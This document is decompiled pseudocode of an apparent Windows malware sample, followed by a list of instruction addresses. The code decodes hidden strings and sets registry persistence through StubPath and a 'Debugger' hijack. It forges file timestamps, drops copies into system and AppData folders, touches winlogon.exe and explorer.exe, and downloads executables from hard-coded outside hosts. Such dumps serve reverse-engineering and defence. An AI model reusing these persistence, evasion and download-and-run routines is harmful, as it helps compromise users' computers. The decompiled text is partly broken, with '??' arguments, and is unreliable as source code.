																							} else {
																								RegSetValueExA(_t870[0x16], "g00d d0gg", 0, 4, _t770, 4);
																							}
																						}
																						RegCloseKey(_t870[0x11]);
																					}
																					continue;
																				}
																				_t500 = RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0x2001f, 0,  &(_t870[0x1c]), 0);
																				__eflags = _t500;
																				if(_t500 != 0) {
																					__eflags =  *_t870;
																					if( *_t870 == 0) {
																						goto L245;
																					}
																					L243:
																					_t870[0xc] = 0;
																					goto L245;
																				}
																				_t868 =  &(_t870[0x19]);
																				GetSystemTimeAsFileTime(_t868);
																				_t870[0x18] = 8;
																				_t842 =  &(_t870[0x17]);
																				_t502 = RegQueryValueExA(_t870[0x20], "ConnPred", 0,  &(_t870[0x17]), _t842,  &(_t870[0x18]));
																				__eflags = _t502;
																				if(_t502 != 0) {
																					L214:
																					__eflags = E004014D8(_t868, 0x412070) - 0x4af;
																					if(__eflags <= 0) {
																						L225:
																						__eflags =  *0x412080;
																						if( *0x412080 == 0) {
																							L228:
																							_t870[0x18] = 8;
																							__eflags = RegQueryValueExA(_t870[0x20], "UseExtProfile", 0,  &(_t870[0x17]), _t842,  &(_t870[0x18]));
																							if(__eflags != 0) {
																								L230:
																								_t507 = E00402427(__eflags);
																								__eflags = _t507;
																								if(_t507 != 0) {
																									L240:
																									RegCloseKey(_t870[0x1b]);
																									goto L241;
																								}
																								_push(1);
																								_push(0);
																								_t510 = E0040211B("http://69.50.173.166/gdnOT2424.exe", 0);
																								__eflags = _t510;
																								if(_t510 == 0) {
																									L233:
																									_t870[0x18] = 8;
																									_t768 =  &(_t870[0x13]);
																									_t512 = RegQueryValueExA(_t870[0x20], "UseDflProfile", 0,  &(_t870[0x17]),  &(_t870[0x13]),  &(_t870[0x18]));
																									__eflags = _t512;
																									if(_t512 != 0) {
																										_t521 = _t870[0x16] + 0x1162f100;
																										__eflags = _t521;
																										asm("adc edx, 0xffffff9b");
																										_t870[0x12] = _t521;
																										_t870[0x13] = _t870[0x17];
																									}
																									__eflags = E004014D8( &(_t870[0x19]), _t768) - 0x152ab;
																									if(__eflags <= 0) {
																										goto L240;
																									} else {
																										_t515 = E00402427(__eflags);
																										__eflags = _t515;
																										if(_t515 != 0) {
																											goto L240;
																										}
																										_push(3);
																										_push(0);
																										_t517 = E0040211B("tombul.gif", 0);
																										__eflags = _t517;
																										if(_t517 == 0) {
																											goto L240;
																										}
																										_push(8);
																										_push(_t868);
																										_push(0xb);
																										_push(0);
																										_push("UseDflProfile");
																										L239:
																										RegSetValueExA(_t870[0x20], ??, ??, ??, ??, ??);
																										RegCloseKey(_t870[0x1b]);
																										 *_t870 = 1;
																										goto L243;
																									}
																								}
																								_t870[0x16] = _t870[0x19].dwLowDateTime;
																								_t870[0x17] = _t870[0x1a];
																								_push(8);
																								_push(_t868);
																								_push(0xb);
																								_push(0);
																								_push("UseExtProfile");
																								goto L239;
																							}
																							__eflags = E004014D8( &(_t870[0x19]),  &(_t870[0x16])) - 0x152ab;
																							if(__eflags <= 0) {
																								goto L233;
																							}
																							goto L230;
																						}
																						_push(3);
																						_push(0);
																						_t526 = E0040211B("grazie.gif", 0);
																						__eflags = _t526;
																						if(_t526 == 0) {
																							goto L228;
																						}
																						_t870[0x16] = _t870[0x19].dwLowDateTime;
																						_t870[0x17] = _t870[0x1a];
																						_push(8);
																						_push(_t868);
																						_push(0xb);
																						_push(0);
																						_push("ConnPred");
																						goto L239;
																					}
																					_t528 = E00402427(__eflags);
																					__eflags = _t528;
																					if(_t528 != 0) {
																						goto L240;
																					}
																					_t530 = E004019E8("http://utbidet-ugeas.biz/d/cc", 0, 1);
																					_t850 = 0;
																					__eflags = _t530;
																					_t769 = _t530;
																					if(_t530 != 0) {
																						_t535 = E00401E00(_t530,  &(_t870[0x15]), 2);
																						__eflags = _t535 - 2;
																						if(_t535 == 2) {
																							_t850 = 1;
																						}
																					}
																					E00401F59(_t769);
																					__eflags = _t850;
																					if(_t850 == 0) {
																						 *0x412080 = 0;
																					} else {
																						 *0x412070 = _t870[0x19];
																						_t534 = 0;
																						__eflags = _t870[0x14] - 0x49;
																						 *0x412074 = _t870[0x1a];
																						if(_t870[0x14] == 0x49) {
																							__eflags = _t870[0x14] - 0x54;
																							if(_t870[0x14] == 0x54) {
																								_t534 = 1;
																							}
																						}
																						 *0x412080 = _t534;
																					}
																					goto L225;
																				}
																				_t537 = E004014D8(_t868, _t842);
																				__eflags = _t537 - 0x152ab;
																				if(_t537 <= 0x152ab) {
																					goto L228;
																				}
																				goto L214;
																				L244:
																				_t311 =  &(_t870[0xc]);
																				 *_t311 = _t870[0xc] + 1;
																				__eflags =  *_t311;
																				goto L245;
																			}
																		}
																		_t538 = 0x4071e0;
																		while(1) {
																			__eflags = _t538 - 0x407214;
																			if(_t538 >= 0x407214) {
																				break;
																			}
																			 *_t538 =  *_t538 ^ 0x000000d4;
																			_t538 =  &(_t538[1]);
																		}
																		_t539 = 0x4071c3;
																		while(1) {
																			__eflags = _t539 - 0x4071cf;
																			if(_t539 >= 0x4071cf) {
																				break;
																			}
																			 *_t539 =  *_t539 ^ 0x000000d4;
																			_t539 =  &(_t539[1]);
																		}
																		_t852 =  &(_t870[0x26]);
																		_t540 = RegCreateKeyA(0x80000002, 0x4071e0, _t852);
																		__eflags = _t540;
																		if(_t540 == 0) {
																			RegSetValueExA(_t870[0x2b], 0x4071c3, 0, 4,  &(_t870[0x28]), 4);
																			RegCloseKey(_t870[0x26]);
																		}
																		_t541 = 0x4071a0;
																		while(1) {
																			__eflags = _t541 - 0x4071c2;
																			if(_t541 >= 0x4071c2) {
																				break;
																			}
																			 *_t541 =  *_t541 ^ 0x000000d4;
																			_t541 =  &(_t541[1]);
																		}
																		_t542 = 0x407177;
																		while(1) {
																			__eflags = _t542 - 0x407188;
																			if(_t542 >= 0x407188) {
																				break;
																			}
																			 *_t542 =  *_t542 ^ 0x000000d4;
																			_t542 =  &(_t542[1]);
																		}
																		_t543 = 0x407160;
																		while(1) {
																			__eflags = _t543 - 0x407176;
																			if(_t543 >= 0x407176) {
																				break;
																			}
																			 *_t543 =  *_t543 ^ 0x000000d4;
																			_t543 =  &(_t543[1]);
																		}
																		_t544 = 0x40714a;
																		while(1) {
																			__eflags = _t544 - 0x40715f;
																			if(_t544 >= 0x40715f) {
																				break;
																			}
																			 *_t544 =  *_t544 ^ 0x000000d4;
																			_t544 =  &(_t544[1]);
																		}
																		_t545 = 0x407135;
																		while(1) {
																			__eflags = _t545 - 0x407149;
																			if(_t545 >= 0x407149) {
																				break;
																			}
																			 *_t545 =  *_t545 ^ 0x000000d4;
																			_t545 =  &(_t545[1]);
																		}
																		_t546 = RegOpenKeyExA(0x80000002, 0x4071a0, 0, 0x20006, _t852);
																		__eflags = _t546;
																		if(_t546 == 0) {
																			_t773 =  &(_t870[0x28]);
																			RegSetValueExA(_t870[0x2b], 0x407177, 0, 4, _t773, 4);
																			RegSetValueExA(_t870[0x2b], 0x407160, 0, 4, _t773, 4);
																			RegSetValueExA(_t870[0x2b], 0x40714a, 0, 4, _t773, 4);
																			RegSetValueExA(_t870[0x2b], 0x407135, 0, 4, _t773, 4);
																			RegCloseKey(_t870[0x26]);
																		}
																		_t547 = 0x4070c0;
																		while(1) {
																			__eflags = _t547 - 0x407134;
																			if(_t547 >= 0x407134) {
																				break;
																			}
																			 *_t547 =  *_t547 ^ 0x000000d4;
																			_t547 =  &(_t547[1]);
																		}
																		_t548 = RegOpenKeyExA(0x80000002, 0x4070c0, 0, 0x2001f, _t852);
																		__eflags = _t548;
																		if(_t548 != 0) {
																			goto L205;
																		}
																		_t550 = E00401000(0x8000);
																		_t870[0x1d] = 0x4000;
																		_t853 = _t550;
																		_t551 = 0x407080;
																		_t870[0x27] = 0x4000;
																		while(1) {
																			__eflags = _t551 - 0x4070a4;
																			if(_t551 >= 0x4070a4) {
																				break;
																			}
																			 *_t551 =  *_t551 ^ 0x000000d4;
																			_t551 =  &(_t551[1]);
																		}
																		_t870[0xd] = 0;
																		while(1) {
																			_t258 =  &(_t853[0x4000]); // 0x4000
																			_t771 = _t258;
																			_t555 = RegEnumValueA(_t870[0x2d], _t870[0x13], _t853,  &(_t870[0x2b]), 0,  &(_t870[0x1e]), _t258,  &(_t870[0x1d]));
																			__eflags = _t555;
																			if(_t555 != 0) {
																				break;
																			}
																			__eflags = _t870[0x1c] - 1;
																			if(_t870[0x1c] == 1) {
																				_t557 = E00401311(_t771, 0x40708d);
																				__eflags = _t557;
																				if(_t557 != 0) {
																					RegDeleteValueA(_t870[0x27], _t853);
																				}
																			}
																			_t253 =  &(_t870[0xd]);
																			 *_t253 = _t870[0xd] + 1;
																			__eflags =  *_t253;
																			_t870[0x1d] = 0x4000;
																			_t870[0x27] = 0x4000;
																		}
																		_t772 =  &(_t870[0x55a]);
																		_t560 = wsprintfA(_t853, 0x407080, _t772) + 1;
																		__eflags = _t560;
																		_t870 =  &(_t870[3]);
																		RegSetValueExA(_t870[0x2b], _t772, 0, 1, _t853, _t560);
																		E00401029(_t853);
																		RegCloseKey(_t870[0x26]);
																		goto L205;
																	}
																	_t578 = RegOpenKeyExA(0x80000001, 0x407220, 0, 0x20006,  &(_t870[0x26]));
																	__eflags = _t578;
																	if(_t578 != 0) {
																		goto L165;
																	}
																	goto L162;
																}
																__eflags = _t423 - 0xffffffff;
																if(_t423 == 0xffffffff) {
																	goto L154;
																}
																L153:
																WriteFile(_t806, 0x408840, 0x5e00,  &(_t870[0x28]), 0);
																CloseHandle(_t870[0x28]);
																goto L155;
															}
															__eflags = _t420 - 0xffffffff;
															if(_t420 != 0xffffffff) {
																goto L153;
															}
															goto L151;
														}
														__eflags = _t586 + 1;
														if(_t586 + 1 != 0) {
															L134:
															WriteFile(_t870[0x2c], 0x40e640, 0x1400,  &(_t870[0x28]), 0);
															__eflags = _t870[3];
															if(_t870[3] != 0) {
																SetFileTime(_t870[0x2b],  &(_t870[0x21]),  &(_t870[0x22]),  &(_t870[0x23]));
															}
															CloseHandle(_t870[0x28]);
															_t870[9] = 1;
															_push(0);
															_push("winlogon.exe");
															_t775 =  &(_t870[0x388]);
															_t592 = E0040318D(_t775);
															_t870 =  &(_t870[3]);
															__eflags = _t592;
															if(_t592 == 0) {
																_push(0);
																_push("explorer.exe");
																E0040318D(_t775);
																_t870 =  &(_t870[3]);
															}
															_push(0);
															_push("kernel32.dll");
															_push(_t775);
															L148:
															E0040318D();
															_t870 =  &(_t870[3]);
															CreateFileA( &(_t870[0x38c]), 0x80000000, 1, 0, 3, 0, 0);
															goto L149;
														}
														goto L146;
													}
													__eflags = _t412 + 1;
													if(_t412 + 1 != 0) {
														goto L134;
													}
													goto L143;
												}
												L140:
												_t870[9] = 1;
												_push(0);
												_push("kernel32.dll");
												_push( &(_t870[0x388]));
												goto L148;
											}
											__eflags = _t408 + 1;
											if(_t408 + 1 == 0) {
												goto L139;
											}
											goto L134;
										} else {
											_t854 =  &(_t870[0x16a]);
											_t600 = GetTempFileNameA(_t756, "tmp", 0, _t854);
											__eflags = _t600;
											if(_t600 == 0) {
												goto L132;
											}
											_t601 = CreateFileA(_t854, 0x40000000, 0, 0, 2, 0x80, 0);
											_t870[0x28] = _t601;
											__eflags = _t601;
											if(_t601 == 0) {
												goto L132;
											}
											__eflags = _t601 + 1;
											if(_t601 + 1 == 0) {
												goto L132;
											}
											L129:
											WriteFile(_t870[0x2c], _t870[8], _t867,  &(_t870[0x28]), 0);
											CloseHandle(_t870[0x28]);
											CreateFileA( &(_t870[0x170]), 0x80000000, 1, 0, 3, 0, 0);
											_t855 =  &(_t870[0x1ee]);
											_t830 =  &(_t870[0x162]);
											_t799 =  &(_t870[0x278]);
											while(1) {
												__eflags = _t855 - _t799;
												if(_t855 >= _t799) {
													goto L132;
												}
												_t609 = _t870[0x1ee] & 0x000000ff ^  *_t830;
												_t830 =  &(_t830[0]);
												 *_t855 = _t609;
												_t855 =  &(_t855[1]);
											}
											goto L132;
										}
									}
									_t856 =  &(_t870[0x16a]);
									_push(_t856);
									_push(0);
									_push(0x411040);
									_push(_t755);
									L00405E90();
									__eflags = _t402;
									if(_t402 == 0) {
										goto L124;
									}
									_push(0);
									_push(0x80);
									_push(2);
									_push(0);
									_push(0);
									_push(0x40000000);
									_push(_t856);
									L00405DB0();
									_t870[0x28] = _t402;
									__eflags = _t402;
									if(_t402 == 0) {
										goto L124;
									}
									__eflags = _t402 + 1;
									if(_t402 + 1 != 0) {
										goto L129;
									}
									goto L124;
								}
								RegDeleteValueA(_t395, "SubshellState");
								RegCloseKey(_t870[0x26]);
								_t857 =  &(_t870[0x1ee]);
								_t831 =  &(_t870[0x162]);
								_t800 =  &(_t870[0x278]);
								while(1) {
									__eflags = _t857 - _t800;
									if(_t857 >= _t800) {
										break;
									}
									_t636 = _t870[0x1ee] & 0x000000ff ^  *_t857;
									_t857 =  &(_t857[0]);
									 *_t831 = _t636;
									_t831 =  &(_t831[1]);
								}
								_push( *0x4120b0);
								_t615 =  &(_t870[0x163]);
								_push(_t615);
								L00405E50();
								__eflags = _t615;
								if(_t615 != 0) {
									L99:
									_t776 =  &(_t870[0x16b]);
									SetFileAttributesA(_t776, 0x80);
									DeleteFileA(_t776);
									goto L113;
								}
								_push( &(_t870[0x55a]));
								_t619 =  &(_t870[0x1ac]);
								_push(_t619);
								L00405E50();
								__eflags = _t619;
								if(_t619 == 0) {
									_t621 = CreateFileA( &(_t870[0x170]), 0x80000000, 1, 0, 3, 0, 0);
									_t870[0x28] = _t621;
									__eflags = _t621;
									if(_t621 == 0) {
										goto L99;
									}
									__eflags = _t621 - 0xffffffff;
									if(_t621 == 0xffffffff) {
										goto L99;
									}
									_t622 = GetFileSize(_t621, 0);
									_t870[0x1d] = _t622;
									__eflags = _t622 - _t867;
									if(_t622 == _t867) {
										_t625 = E00401000(_t867);
										_t858 = _t625;
										ReadFile(_t870[0x2c], _t625, _t867,  &(_t870[0x28]), 0);
										_t777 = _t870[0x1d];
										_t832 = _t858;
										_t843 = _t870[5];
										__eflags = _t858 - _t858 + _t777;
										while(__eflags < 0) {
											_t801 =  *_t832 & 0x000000ff;
											__eflags = _t870[0x162] - ( *_t843 & 0x000000ff);
											if(__eflags == 0) {
												__eflags = _t801;
											}
											if(__eflags == 0) {
												_t832 =  &(_t832[1]);
												_t843 =  &(_t843[1]);
												__eflags = _t832 - _t858 + _t777;
												continue;
											} else {
												E00401029(_t858);
												goto L103;
											}
										}
										E00401029(_t858);
										goto L132;
									}
									L103:
									CloseHandle(_t870[0x28]);
								}
								goto L99;
							}
							_t778 =  &(_t870[0x3cb]);
							_t637 = GetSystemDirectoryA(_t778, 0x104);
							_push( *0x412090);
							_push(0x41103e);
							_push(_t778);
							L00405E30();
							_push(_t637);
							L00405E30();
							_t638 = 0x407260;
							while(1) {
								__eflags = _t638 - 0x407286;
								if(_t638 >= 0x407286) {
									break;
								}
								 *_t638 =  *_t638 ^ 0x000000d4;
								_t638 =  &(_t638[1]);
							}
							_t639 = CreateMutexA(0, 0, "h`r@");
							_t870[0x28] = _t639;
							__eflags = _t639;
							if(_t639 == 0) {
								Sleep(0x7d0);
							} else {
								WaitForSingleObject(_t639, 0x2710);
								CloseHandle(_t870[0x28]);
							}
							_t779 =  &(_t870[0x3cb]);
							SetFileAttributesA(_t779, 0x80);
							_t641 = CreateFileA(_t779, 0x40000000, 0, 0, 2, 0x80, 0);
							_t870[0x28] = _t641;
							__eflags = _t641;
							if(_t641 == 0) {
								L92:
								RegCloseKey(_t870[0x26]);
								RegDeleteKeyA(0x80000001,  &(_t870[0x40e]));
								goto L93;
							} else {
								__eflags = _t641 - 0xffffffff;
								if(_t641 == 0xffffffff) {
									goto L92;
								}
								WriteFile(_t641, 0x4072a0, 0x800,  &(_t870[0x28]), 0);
								_t646 = E004010B2();
								_t870[6] = _t646;
								__eflags = _t646;
								if(_t646 == 0) {
									_t870[6] = 0xc6;
								}
								_t648 = E00401000(_t867 + 0x64);
								 *((char*)(_t648 + _t867)) = 0;
								_t844 = _t648;
								_t859 = _t648;
								_t834 = _t870[5];
								_t649 = _t648 + _t867;
								while(1) {
									__eflags = _t859 - _t649;
									if(_t859 >= _t649) {
										break;
									}
									_t674 = _t870[6] & 0x000000ff ^  *_t834;
									_t834 =  &(_t834[0]);
									 *_t859 = _t674;
									_t859 = _t859 + 1;
									_t649 = _t844 + _t867;
								}
								_t650 =  &(_t870[0x55a]);
								_t780 = _t844 + _t867;
								_push(_t650);
								L00405E40();
								_t860 = _t780 +  &(_t650[1]);
								__eflags = _t860 - _t780 + 0x64;
								while(__eflags < 0) {
									 *_t860 = E004010B2();
									_t860 = _t860 + 1;
									_t127 = _t867 + 0x64; // 0x64
									__eflags = _t860 - _t844 + _t127;
								}
								 *(_t844 + _t867 + 1) = _t867;
								_t782 = _t844 + _t867;
								_push( &(_t870[0x55a]));
								_t861 = _t782;
								_push( &(_t782[1]));
								L00405E20();
								_t653 =  &(_t782[0x19]);
								while(1) {
									__eflags = _t861 - _t653;
									if(_t861 >= _t653) {
										break;
									}
									 *_t861 =  *_t861 ^ _t870[6] & 0x000000ff;
									_t861 =  &(_t861[0]);
									_t136 = _t867 + 0x64; // 0x64
									_t653 = _t844 + _t136;
								}
								WriteFile(_t870[0x2c], _t844, _t867 + 0x64,  &(_t870[0x28]), 0);
								E00401029(_t844);
								__eflags = _t870[3];
								if(_t870[3] != 0) {
									SetFileTime(_t870[0x2b],  &(_t870[0x21]),  &(_t870[0x22]),  &(_t870[0x23]));
								}
								CloseHandle(_t870[0x28]);
								_t783 =  &(_t870[0x3d0]);
								CreateFileA(_t783, 0x80000000, 1, 0, 3, 0, 0);
								E00401251(_t870[0x26]);
								_t870[0x27] = 1;
								_t663 = RegSetValueExA(_t870[0x2b], "IsInstalled", 0, 4,  &(_t870[0x28]), 4);
								_push(_t783);
								L00405E40();
								_t664 = _t663 + 1;
								__eflags = _t664;
								RegSetValueExA(_t870[0x2b], "StubPath", 0, 1, _t783, _t664);
								_t870[0xa] = 1;
								goto L92;
							}
						}
						__eflags =  *((char*)(_t869 + 0x1e8));
						if( *((char*)(_t869 + 0x1e8)) != 0) {
							_push(_t753);
							_t677 = _t869 + 0x1bc;
							_push(_t677);
							L00405E20();
							while(1) {
								_t784 = _t869 + 0x1b8;
								_push(_t784);
								L00405E40();
								__eflags = _t677 - 0xf;
								if(_t677 > 0xf) {
									goto L62;
								}
								_t677 = _t869 + 0x1e8;
								_push(_t677);
								_push(_t784);
								L00405E30();
							}
							goto L62;
						}
						goto L58;
					}
					_t679 = RegCreateKeyA(0x80000002, 0x408720, _t869 + 0x98);
					__eflags = _t679;
					if(_t679 != 0) {
						goto L56;
					}
					_t785 = _t869 + 0x123c;
					_t680 = GetSystemDirectoryA(_t785, 0x104);
					_push( *0x4120a0);
					_push(0x41103e);
					_push(_t785);
					L00405E30();
					_push(_t680);
					L00405E30();
					_t681 = 0x407ae0;
					while(1) {
						__eflags = _t681 - 0x407b06;
						if(_t681 >= 0x407b06) {
							break;
						}
						 *_t681 =  *_t681 ^ 0x000000d4;
						_t681 =  &(_t681[1]);
					}
					_t682 = CreateMutexA(0, 0, 0x407ae0);
					 *(_t869 + 0xa0) = _t682;
					__eflags = _t682;
					if(_t682 == 0) {
						Sleep(0x7d0);
					} else {
						WaitForSingleObject(_t682, 0x2710);
						CloseHandle( *(_t869 + 0xa0));
					}
					_t786 = _t869 + 0x123c;
					SetFileAttributesA(_t786, 0x80);
					_t684 = CreateFileA(_t786, 0x40000000, 0, 0, 2, 0x80, 0);
					 *(_t869 + 0xa0) = _t684;
					__eflags = _t684;
					if(_t684 == 0) {
						L55:
						RegCloseKey( *(_t869 + 0x98));
						goto L56;
					} else {
						__eflags = _t684 - 0xffffffff;
						if(_t684 == 0xffffffff) {
							goto L55;
						}
						WriteFile(_t684, 0x407b20, 0xc00, _t869 + 0xa0, 0);
						_t687 = E004010B2();
						 *(_t869 + 0x1b) = _t687;
						__eflags = _t687;
						if(_t687 == 0) {
							 *(_t869 + 0x1b) = 0x66;
						}
						_t689 = E00401000(_t867 + 0x64);
						 *((char*)(_t689 + _t867)) = 0;
						_t845 = _t689;
						_t862 = _t689;
						_t837 =  *(_t869 + 0x14);
						_t690 = _t689 + _t867;
						while(1) {
							__eflags = _t862 - _t690;
							if(_t862 >= _t690) {
								break;
							}
							_t714 =  *(_t869 + 0x1b) & 0x000000ff ^  *_t837;
							_t837 =  &(_t837[0]);
							 *_t862 = _t714;
							_t862 = _t862 + 1;
							_t690 = _t845 + _t867;
						}
						_t691 = _t869 + 0x1568;
						_t787 = _t845 + _t867;
						_push(_t691);
						L00405E40();
						_t863 = _t787 + _t691 + 5;
						__eflags = _t863 - _t787 + 0x64;
						while(__eflags < 0) {
							 *_t863 = E004010B2();
							_t863 = _t863 + 1;
							_t55 = _t867 + 0x64; // 0x64
							__eflags = _t863 - _t845 + _t55;
						}
						 *(_t845 + _t867 + 1) = _t867;
						_t789 = _t845 + _t867;
						_push(_t869 + 0x1568);
						_t864 = _t789;
						_push( &(_t789[1]));
						L00405E20();
						_t694 =  &(_t789[0x19]);
						while(1) {
							__eflags = _t864 - _t694;
							if(_t864 >= _t694) {
								break;
							}
							 *_t864 =  *_t864 ^  *(_t869 + 0x1b) & 0x000000ff;
							_t864 =  &(_t864[0]);
							_t64 = _t867 + 0x64; // 0x64
							_t694 = _t845 + _t64;
						}
						WriteFile( *(_t869 + 0xb0), _t845, _t867 + 0x64, _t869 + 0xa0, 0);
						E00401029(_t845);
						__eflags =  *(_t869 + 0xc);
						if( *(_t869 + 0xc) != 0) {
							SetFileTime( *(_t869 + 0xac), _t869 + 0x84, _t869 + 0x88, _t869 + 0x8c);
						}
						CloseHandle( *(_t869 + 0xa0));
						_t790 = _t869 + 0x1250;
						CreateFileA(_t790, 0x80000000, 1, 0, 3, 0, 0);
						RegDeleteValueA( *(_t869 + 0x9c), "Debugger");
						_t703 = E00401251( *(_t869 + 0x98));
						_push(_t790);
						L00405E40();
						_t704 = _t703 + 1;
						__eflags = _t704;
						RegSetValueExA( *(_t869 + 0xac), "Debugger", 0, 1, _t790, _t704);
						 *(_t869 + 0x2c) = 1;
						goto L55;
					}
				}
				_t791 = _t869 + 0x145c;
				_t722 = GetSystemDirectoryA(_t791, 0x100);
				_push( *0x4120b0);
				_push(0x41103e);
				_push(_t791);
				L00405E30();
				L00405E30();
				_t865 = _t869 + 0x1568;
				_t724 = E004010F7(_t869 + 0x1568, _t791, _t722);
				if(_t724 != 0) {
					L8:
					if( *(_t869 + 0x20) != 0) {
						_t737 = CreateFileA(_t869 + 0x1470, 0x40000000, 0, 0, 3, 0, 0);
						_t794 = _t737;
						if(_t737 != 0 && _t737 != 0xffffffff) {
							SetFilePointer(_t737, 0xfffffff0, 0, 2);
							WriteFile(_t794, 0x4120e0, 4, _t869 + 0xa0, 0);
							CloseHandle(_t794);
						}
					}
					if( *(_t869 + 0xc) != 0) {
						_t730 = CreateFileA(_t869 + 0x1470, 0x80000100, 1, 0, 3, 0, 0); // executed
						_t793 = _t730;
						if(_t730 != 0 && _t730 != 0xffffffff) {
							SetFileTime(_t793, _t869 + 0x84, _t869 + 0x88, _t869 + 0x8c); // executed
							CloseHandle(_t793);
						}
					}
					_t866 = _t869 + 0x145c;
					SetFileAttributesA(_t866, 0x21); // executed
					CloseHandle( *(_t869 + 0x10));
					_t792 = _t869 + 0xb28;
					GetStartupInfoA(_t792);
					_push(_t869 + 0xb18);
					_push(_t792);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(_t866); // executed
					CreateProcessA(); // executed
					ExitProcess(0); // executed
					L19:
					 *0x412000 = 1;
					goto L20;
				}
				_push(0x104);
				_push(_t791);
				_push( *0x4120b0);
				_push("%CommonProgramFiles%\\System\\");
				_t846 = _t869 + 0x1358;
				L00405E20();
				L00405E30();
				_t742 = ExpandEnvironmentStringsA(_t724, _t724, _t846);
				if(_t742 == 0) {
					L6:
					_push(0x104);
					_push(_t791);
					_push( *0x4120b0);
					_push("%AppData%\\");
					L00405E20();
					L00405E30();
					if(ExpandEnvironmentStringsA(_t742, _t742, _t846) == 0 || E004010F7(_t865, _t791) == 0) {
						goto L19;
					} else {
						goto L8;
					}
				}
				_t742 = E004010F7(_t865, _t791);
				if(_t742 != 0) {
					goto L8;
				}
				goto L6;
			}

0x004042b2
0x004042b7
0x004042c1
0x004042c3
0x004042de
0x004042ea
0x004042ef
0x004042ef
0x004042fc
0x004044af
0x004044c6
0x004044cb
0x004044d4
0x00404517
0x0040451f
0x0040451f
0x004044db
0x004044e3
0x004044ea
0x00404504
0x00404510
0x00404510
0x00404545
0x0040454a
0x0040454f
0x00404556
0x00404559
0x00404559
0x00404561
0x00404561
0x00404566
0x00000000
0x00000000
0x00404568
0x00404568
0x00404569
0x00404569
0x0040456e
0x00404575
0x004047c9
0x004047c9
0x004047d6
0x004047de
0x004047e3
0x004047e5
0x004047f1
0x004047f1
0x004047fd
0x004047fe
0x00404835
0x004048cf
0x004048d4
0x004048d7
0x004048dc
0x004048dc
0x004048e1
0x00000000
0x00000000
0x004048e3
0x004048e6
0x004048e6
0x004048ee
0x004048ee
0x004048f3
0x00000000
0x00000000
0x004048f5
0x004048f5
0x004048f6
0x004048f6
0x004048fb
0x00404900
0x00404905
0x0040490c
0x0040490d
0x00404912
0x00404913
0x00404926
0x0040492b
0x0040492d
0x00404b8d
0x00404b94
0x00404b99
0x00404ba0
0x00404ba2
0x00404ce5
0x00404ce5
0x00404cea
0x00404cec
0x00404cee
0x00404cf0
0x00404cf0
0x00404cf2
0x00404cf9
0x00404cfe
0x00404d00
0x00404d02
0x00404d04
0x00404d04
0x00404d06
0x00404d0d
0x00404d1a
0x00404d1b
0x00404d27
0x00404d2f
0x00404d30
0x00404d35
0x00404d39
0x00404d3c
0x00404d3c
0x00404d3e
0x00000000
0x00000000
0x00404d48
0x00404d4a
0x00404d4f
0x00404d4f
0x00404d58
0x00404d65
0x00404d6a
0x00404d6c
0x00404dad
0x00404dad
0x00404dba
0x00404dbf
0x00404dc1
0x00404e76
0x00404e7a
0x00404e84
0x00404e8c
0x00404e91
0x00404e96
0x00404e9c
0x00404ea1
0x00404ea2
0x00404ea8
0x00404eae
0x00404ec6
0x00404ecb
0x00404ed2
0x00404ed4
0x00404f78
0x00404f78
0x00404f7d
0x00404f80
0x00404fa3
0x00404fb0
0x00404fb5
0x00404fba
0x00404fc1
0x00404fc7
0x00404fdf
0x00404fe4
0x00404feb
0x00404fed
0x00404ff6
0x00404ff6
0x00404ffb
0x00404ffe
0x00000000
0x00000000
0x00405006
0x0040500b
0x00405010
0x00405017
0x0040501d
0x00405035
0x0040503a
0x00405041
0x00405043
0x0040504c
0x0040504c
0x00405051
0x00405054
0x00000000
0x00000000
0x00405080
0x00405085
0x00405092
0x00405097
0x0040509c
0x004050a3
0x004050a9
0x004050c1
0x004050c6
0x004050cd
0x004050cf
0x004050d1
0x004050d8
0x004050d8
0x004050e5
0x004050ea
0x004050ef
0x004050f6
0x004050fc
0x00405114
0x00405119
0x00405120
0x00405122
0x00405124
0x00405153
0x00405153
0x0040515b
0x0040515b
0x00405163
0x0040517c
0x0040517c
0x00405186
0x0040518e
0x00405193
0x00405198
0x00405199
0x004051a0
0x004051b0
0x004051b7
0x004051c7
0x004051ce
0x004051d3
0x004051d8
0x004051d8
0x004051dd
0x00000000
0x00000000
0x004051df
0x004051e2
0x004051e2
0x004051fe
0x00405203
0x00405205
0x00405229
0x00405229
0x0040522e
0x00405237
0x0040523e
0x00405243
0x00405244
0x00405249
0x00405249
0x0040525d
0x0040525d
0x0040526e
0x0040527a
0x0040527f
0x0040527f
0x00405286
0x004054f1
0x0040550f
0x00405514
0x00405519
0x00405519
0x0040551e
0x00000000
0x00000000
0x00405520
0x00405523
0x00405523
0x00405526
0x0040552e
0x00405538
0x0040553d
0x00405542
0x00000000
0x00000000
0x00405548
0x00405550
0x00405558
0x0040555d
0x0040555f
0x004057d5
0x004057d5
0x004057f2
0x004057f2
0x004057fa
0x004057fa
0x00405802
0x00405804
0x00405806
0x0040580b
0x00405810
0x00405815
0x0040581a
0x0040581f
0x0040582c
0x00405831
0x00405831
0x00405834
0x00405839
0x00405841
0x00405849
0x00405863
0x00405868
0x0040586a
0x00405873
0x00405878
0x0040589d
0x004058a2
0x004058a3
0x004058a8
0x004058a8
0x004058bb
0x004058c7
0x004058c7
0x0040586a
0x004058cc
0x004058d1
0x004058d8
0x00405933
0x00405938
0x0040593a
0x00405957
0x00405957
0x0040595e
0x0040595f
0x00405964
0x00405964
0x00405965
0x00405966
0x00405967
0x00405969
0x0040596b
0x00000000
0x0040596b
0x0040594e
0x00405953
0x00405955
0x00000000
0x00000000
0x00000000
0x004058da
0x004058dc
0x004058e4
0x004058f4
0x004058f9
0x004058fb
0x00405989
0x00405989
0x0040598e
0x00000000
0x00000000
0x00405996
0x004059b8
0x004059bd
0x004059bf
0x004059e7
0x00405a04
0x00405a10
0x00405a15
0x00405a17
0x00405a1f
0x00405a24
0x00405a2b
0x00405a32
0x00405a9f
0x00405aa4
0x00405aa6
0x00000000
0x00000000
0x00405aa8
0x00405aa9
0x00405abe
0x00405ada
0x00405ae6
0x00405af6
0x00405afb
0x00405afd
0x00000000
0x00000000
0x00405aff
0x00405b06
0x00000000
0x00405b06
0x00405a3f
0x00405a44
0x00405a46
0x00000000
0x00000000
0x00405a53
0x00405a58
0x00405a59
0x00405a71
0x00405a8d
0x00000000
0x00405a8d
0x004059de
0x004059e3
0x004059e5
0x00000000
0x00000000
0x00000000
